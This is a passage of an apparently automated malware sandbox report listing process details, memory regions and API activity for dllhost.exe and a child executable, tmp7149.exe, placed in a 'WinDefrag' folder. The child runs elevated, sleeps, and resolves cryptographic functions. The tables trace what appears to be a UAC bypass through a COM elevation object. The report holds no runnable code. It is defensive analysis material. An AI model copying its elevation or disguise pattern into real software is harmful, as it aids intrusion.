| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 79 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 25 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 54 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 |
Process #16: dllhost.exe
0
0
| Information | Value |
|---|---|
| ID | #16 |
| File Name | c:\windows\syswow64\dllhost.exe |
| Command Line | C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:09, Reason: RPC Server |
| Unmonitor | End Time: 00:02:15, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x368 |
| Parent PID | 0x258 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
404
0x
760
0x
7BC
0x
308
0x
79C
0x
318
0x
584
0x
664
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00070fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000080000 | 0x00080000 | 0x00080fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000090000 | 0x00090000 | 0x00091fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x000a0000 | 0x000a3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00131fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00140fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x00190000 | 0x00193fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x001dffff | Private Memory | rw |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x001e0000 | 0x001fffff | Memory Mapped File | r |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x00200000 | 0x0022ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0032ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00330000 | 0x00396fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x003a6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000003b0000 | 0x003b0000 | 0x003b1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x0040ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000440000 | 0x00440000 | 0x0047ffff | Private Memory | rw |
|
|
|
- |
| dllhost.exe | 0x004d0000 | 0x004d4fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000004e0000 | 0x004e0000 | 0x00667fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000670000 | 0x00670000 | 0x007f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000800000 | 0x00800000 | 0x01bfffff | Pagefile Backed Memory | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x01c00000 | 0x01c65fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001c90000 | 0x01c90000 | 0x01ccffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001d00000 | 0x01d00000 | 0x01d3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001dc0000 | 0x01dc0000 | 0x01dfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001e30000 | 0x01e30000 | 0x01e6ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01e70000 | 0x0213efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002150000 | 0x02150000 | 0x0218ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002190000 | 0x02190000 | 0x021cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002220000 | 0x02220000 | 0x0225ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000022b0000 | 0x022b0000 | 0x022effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000022f0000 | 0x022f0000 | 0x023cefff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002400000 | 0x02400000 | 0x0243ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002440000 | 0x02440000 | 0x0247ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002530000 | 0x02530000 | 0x0256ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002570000 | 0x02570000 | 0x0266ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002670000 | 0x02670000 | 0x02a62fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002ac0000 | 0x02ac0000 | 0x02afffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b00000 | 0x02b00000 | 0x02b3ffff | Private Memory | rw |
|
|
|
- |
| shdocvw.dll | 0x74630000 | 0x7465dfff | Memory Mapped File | rwx |
|
|
|
- |
| cmlua.dll | 0x74660000 | 0x7466bfff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x74dd0000 | 0x74ec4fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74ed0000 | 0x7506dfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x75210000 | 0x7528ffff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x75380000 | 0x7538dfff | Memory Mapped File | rwx |
|
|
|
- |
| cmutil.dll | 0x75390000 | 0x7539dfff | Memory Mapped File | rwx |
|
|
|
- |
| cmstplua.dll | 0x753a0000 | 0x753a7fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x753b0000 | 0x753b8fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x753c0000 | 0x7540bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x75410000 | 0x75430fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x754e0000 | 0x7551afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75520000 | 0x75535fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75950000 | 0x7595afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75ac0000 | 0x75bf5fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75c60000 | 0x75cb6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x75cf0000 | 0x75e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75f20000 | 0x75f31fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x76040000 | 0x760c2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x76330000 | 0x7644cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x76530000 | 0x76574fff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x76580000 | 0x7671cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76720000 | 0x767aefff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x767e0000 | 0x769dafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76b00000 | 0x77749fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x77750000 | 0x77776fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x77800000 | 0x7780bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x77920000 | 0x77a14fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efa1000 | 0x7efa1000 | 0x7efa3fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efa4000 | 0x7efa4000 | 0x7efa6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Process #17: tmp7149.exe
1984
0
| Information | Value |
|---|---|
| ID | #17 |
| File Name | c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Roaming\WinDefrag\tmp7149.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:09, Reason: Child Process |
| Unmonitor | End Time: 00:02:22, Reason: Self Terminated |
| Monitor Duration | 00:00:13 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x668 |
| Parent PID | 0x368 (c:\windows\syswow64\dllhost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
24C
0x
8B8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x0003ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00293fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x002a0000 | 0x00306fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x00310fff | Private Memory | rwx |
|
|
|
- |
| rsaenh.dll | 0x00320000 | 0x0035bfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x0035ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000360000 | 0x00360000 | 0x00366fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000370000 | 0x00370000 | 0x00371fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x00380fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x003cffff | Private Memory | rwx |
|
|
|
- |
| imm32.dll | 0x003d0000 | 0x003edfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x003f0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| tmp7149.exe | 0x00400000 | 0x00487fff | Memory Mapped File | rwx |
|
|
|
|
| private_0x0000000000490000 | 0x00490000 | 0x0058ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000590000 | 0x00590000 | 0x00594fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000005a0000 | 0x005a0000 | 0x005affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005b0000 | 0x005b0000 | 0x005c1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000005b0000 | 0x005b0000 | 0x005b0fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x005c0fff | Private Memory | rwx |
|
|
|
- |
| kernelbase.dll | 0x005d0000 | 0x0063afff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x00668fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x00648fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x00640fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x00642fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000680000 | 0x00680000 | 0x006fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000700000 | 0x00700000 | 0x00887fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000008f0000 | 0x008f0000 | 0x009effff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x009f0000 | 0x00cbefff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000cc0000 | 0x00cc0000 | 0x00ebffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ec0000 | 0x00ec0000 | 0x012b2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000012c0000 | 0x012c0000 | 0x01440fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001450000 | 0x01450000 | 0x0284ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002850000 | 0x02850000 | 0x02c5ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000002c60000 | 0x02c60000 | 0x0306ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000010000000 | 0x10000000 | 0x10006fff | Private Memory | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x754c0000 | 0x754d6fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x754e0000 | 0x7551afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75520000 | 0x75535fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75950000 | 0x7595afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75c60000 | 0x75cb6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x75cf0000 | 0x75e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x76330000 | 0x7644cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76b00000 | 0x77749fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x77800000 | 0x7780bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Threads
Thread 0x24c
1764
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-12-06 22:27:51 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 180461 |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-use_fc_key |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-use_fc_key |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-sjlj_once |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-sjlj_once |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-once_global_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-once_global_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-once_obj_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-once_obj_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-mutex_global_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-mutex_global_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-_pthread_tls_once_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-_pthread_tls_once_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-_pthread_tls_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-_pthread_tls_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-mtx_pthr_locked_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-mtx_pthr_locked_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-mutex_global_static_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-mutex_global_static_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-mxattr_recursive_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-mxattr_recursive_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-pthr_root_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-pthr_root_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-idListCnt_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-idListCnt_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-idListMax_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-idListMax_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-idList_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-idList_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-idListNextId_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-idListNextId_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-fc_key |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-fc_key |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-_pthread_key_lock_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-_pthread_key_lock_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-_pthread_cancelling_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-_pthread_cancelling_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-cond_locked_shmem_rwlock |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-cond_locked_shmem_rwlock |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-rwl_global_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-rwl_global_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-_pthread_key_sch_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-_pthread_key_sch_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-_pthread_key_max_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-_pthread_key_max_shmem |
|
1 | |
| Mutex | Create | mutex_name = gcc-shmem-tdm2-_pthread_key_dest_shmem |
|
1 | |
| Mutex | Release | mutex_name = gcc-shmem-tdm2-_pthread_key_dest_shmem |
|
1 | |
| System | Sleep | duration = 15000 milliseconds (15.000 seconds) |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x76490000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextA, address_out = 0x764991dd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x7649c532 |
|
1 | |
